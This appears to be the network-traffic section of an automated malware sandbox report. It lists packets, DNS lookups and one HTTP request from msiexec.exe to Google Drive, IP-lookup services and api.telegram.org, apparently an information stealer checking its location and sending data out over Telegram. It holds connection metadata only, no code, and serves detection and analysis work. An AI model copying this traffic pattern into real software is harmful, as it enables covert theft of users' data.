Dec 23, 2024 21:50:47.931855917 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.931916952 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.931941986 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.932035923 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.935143948 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.935199022 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.935400963 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.935569048 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.938775063 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.938848019 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.939084053 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.939142942 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.942683935 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.942751884 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.942972898 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.943027020 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.945611000 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.945671082 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.945835114 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.945888042 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.948784113 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.948839903 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.948975086 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.949023008 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.952341080 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.952394009 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.952488899 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.952537060 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.955091000 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.955144882 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.955279112 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.955329895 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.958195925 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.958250999 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.958405018 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.958452940 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.961426020 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.961482048 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.961620092 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.961672068 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.964272976 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.964327097 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.964493036 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.964545012 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.967077971 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.967128992 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.967288017 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.967338085 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.970026016 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.970077038 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.970276117 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.970326900 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.970870972 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.970921993 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.973777056 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.973831892 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.974066019 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.974128962 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.976032019 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.976088047 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.976476908 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.976528883 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.978750944 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.978804111 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.978940010 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.978991985 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.981446028 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.981501102 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.982376099 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.982429028 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.985438108 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.985496044 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.985784054 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.985836029 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.990766048 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.990906000 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.991730928 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.991785049 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.991822004 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.991873980 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.991910934 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.991966009 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.992003918 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:47.992069006 CET	443	49758	142.250.181.1	192.168.2.7
Dec 23, 2024 21:50:47.992126942 CET	49758	443	192.168.2.7	142.250.181.1
Dec 23, 2024 21:50:48.331712961 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:48.453264952 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:48.453398943 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:48.453650951 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:48.573088884 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:51.875049114 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:51.878305912 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:51.997952938 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:52.359551907 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:52.410773993 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:52.766197920 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:52.766249895 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:52.766441107 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:52.768181086 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:52.768198013 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.005714893 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.005790949 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:54.018877983 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:54.018902063 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.019166946 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.022182941 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:54.063374996 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.462685108 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.462754011 CET	443	49782	104.21.67.152	192.168.2.7
Dec 23, 2024 21:50:54.462901115 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:54.467828035 CET	49782	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:50:54.474169970 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:54.593981028 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:57.960860968 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:50:57.985455990 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:50:58.106336117 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:01.469754934 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:01.472995043 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:01.592466116 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:01.944652081 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:01.946877003 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:01.946924925 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:01.946985960 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:01.947241068 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:01.947257042 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:01.988940954 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.161885023 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:03.163681030 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:03.163722038 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:03.616503000 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:03.616595984 CET	443	49804	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:03.616645098 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:03.616993904 CET	49804	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:03.619931936 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.620930910 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.739869118 CET	80	49772	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:03.739950895 CET	49772	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.740478039 CET	80	49809	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:03.740587950 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.740668058 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:03.860157013 CET	80	49809	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:05.133840084 CET	80	49809	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:05.134996891 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:05.135044098 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:05.135113001 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:05.135320902 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:05.135328054 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:05.176482916 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:06.352863073 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:06.373209953 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:06.373238087 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:06.807986021 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:06.808101892 CET	443	49812	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:06.808166027 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:06.812911034 CET	49812	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:06.816029072 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:06.817076921 CET	49817	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:06.936167955 CET	80	49809	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:06.936342001 CET	49809	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:06.936553001 CET	80	49817	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:06.936630964 CET	49817	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:06.936796904 CET	49817	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:07.056340933 CET	80	49817	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:09.439604998 CET	80	49817	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:09.498770952 CET	49817	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:09.694552898 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:09.694603920 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:09.694664001 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:09.694938898 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:09.694952965 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:10.931440115 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:10.932846069 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:10.932887077 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:11.379204988 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:11.379374027 CET	443	49823	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:11.379442930 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:11.379781008 CET	49823	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:11.384227991 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:11.503820896 CET	80	49829	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:11.504077911 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:11.504100084 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:11.623714924 CET	80	49829	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:15.906677961 CET	80	49829	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:15.911211967 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:15.957757950 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:16.030808926 CET	80	49841	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:16.030890942 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:16.031003952 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:16.150487900 CET	80	49841	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:18.536293030 CET	80	49841	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:18.536737919 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:18.537700891 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:18.537751913 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:18.537832975 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:18.538053989 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:18.538065910 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:18.582775116 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:18.656795025 CET	80	49829	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:18.656933069 CET	49829	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:19.752079010 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:19.753604889 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:19.753655910 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:20.223536968 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:20.223623991 CET	443	49848	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:20.223675013 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:20.224044085 CET	49848	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:20.229145050 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:20.229940891 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:20.350141048 CET	80	49841	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:20.350241899 CET	80	49854	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:20.350296021 CET	49841	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:20.350445032 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:20.350445032 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:20.469912052 CET	80	49854	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:22.020172119 CET	80	49854	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:22.021962881 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:22.022011042 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:22.022080898 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:22.022465944 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:22.022484064 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:22.067150116 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:23.233692884 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:23.244328976 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:23.244352102 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:23.842701912 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:23.842773914 CET	443	49860	104.21.67.152	192.168.2.7
Dec 23, 2024 21:51:23.842822075 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:23.843189955 CET	49860	443	192.168.2.7	104.21.67.152
Dec 23, 2024 21:51:23.858861923 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:23.978739977 CET	80	49854	132.226.8.169	192.168.2.7
Dec 23, 2024 21:51:23.978822947 CET	49854	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:23.996689081 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:23.996723890 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:23.996798992 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:23.997451067 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:23.997462034 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.416604042 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.416801929 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:25.419894934 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:25.419907093 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.420304060 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.421719074 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:25.463372946 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.920968056 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.921041965 CET	443	49866	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:25.921106100 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:25.921513081 CET	49866	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:32.152441978 CET	49817	80	192.168.2.7	132.226.8.169
Dec 23, 2024 21:51:32.346254110 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:32.346293926 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:32.346405029 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:32.346687078 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:32.346698046 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:33.806071997 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:33.807807922 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:33.807817936 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:33.807887077 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:33.807893038 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:34.564969063 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:34.565254927 CET	443	49884	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:34.565377951 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:34.565913916 CET	49884	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:36.285495043 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:36.285521984 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:36.285590887 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:36.285857916 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:36.285872936 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:37.672405958 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:37.675050974 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:37.675081015 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:37.675154924 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:37.675163984 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:38.352771044 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:38.352963924 CET	443	49895	149.154.167.220	192.168.2.7
Dec 23, 2024 21:51:38.353033066 CET	49895	443	192.168.2.7	149.154.167.220
Dec 23, 2024 21:51:38.353302956 CET	49895	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 21:50:39.359652042 CET	49517	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:50:39.498251915 CET	53	49517	1.1.1.1	192.168.2.7
Dec 23, 2024 21:50:42.151679039 CET	53865	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:50:42.288345098 CET	53	53865	1.1.1.1	192.168.2.7
Dec 23, 2024 21:50:48.186707020 CET	65242	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:50:48.326334000 CET	53	65242	1.1.1.1	192.168.2.7
Dec 23, 2024 21:50:52.627423048 CET	56551	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:50:52.765371084 CET	53	56551	1.1.1.1	192.168.2.7
Dec 23, 2024 21:51:23.858787060 CET	53301	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:51:23.995867968 CET	53	53301	1.1.1.1	192.168.2.7
Dec 23, 2024 21:51:36.135481119 CET	61209	53	192.168.2.7	1.1.1.1
Dec 23, 2024 21:51:36.272743940 CET	53	61209	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 21:50:39.359652042 CET	192.168.2.7	1.1.1.1	0x36b8	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:42.151679039 CET	192.168.2.7	1.1.1.1	0x2faa	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.186707020 CET	192.168.2.7	1.1.1.1	0x20f6	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:52.627423048 CET	192.168.2.7	1.1.1.1	0x487b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:51:23.858787060 CET	192.168.2.7	1.1.1.1	0x4f69	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:51:36.135481119 CET	192.168.2.7	1.1.1.1	0x5734	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 21:50:39.498251915 CET	1.1.1.1	192.168.2.7	0x36b8	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:42.288345098 CET	1.1.1.1	192.168.2.7	0x2faa	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:48.326334000 CET	1.1.1.1	192.168.2.7	0x20f6	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:52.765371084 CET	1.1.1.1	192.168.2.7	0x487b	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:50:52.765371084 CET	1.1.1.1	192.168.2.7	0x487b	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:51:23.995867968 CET	1.1.1.1	192.168.2.7	0x4f69	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 23, 2024 21:51:36.272743940 CET	1.1.1.1	192.168.2.7	0x5734	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49772	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:50:48.453650951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
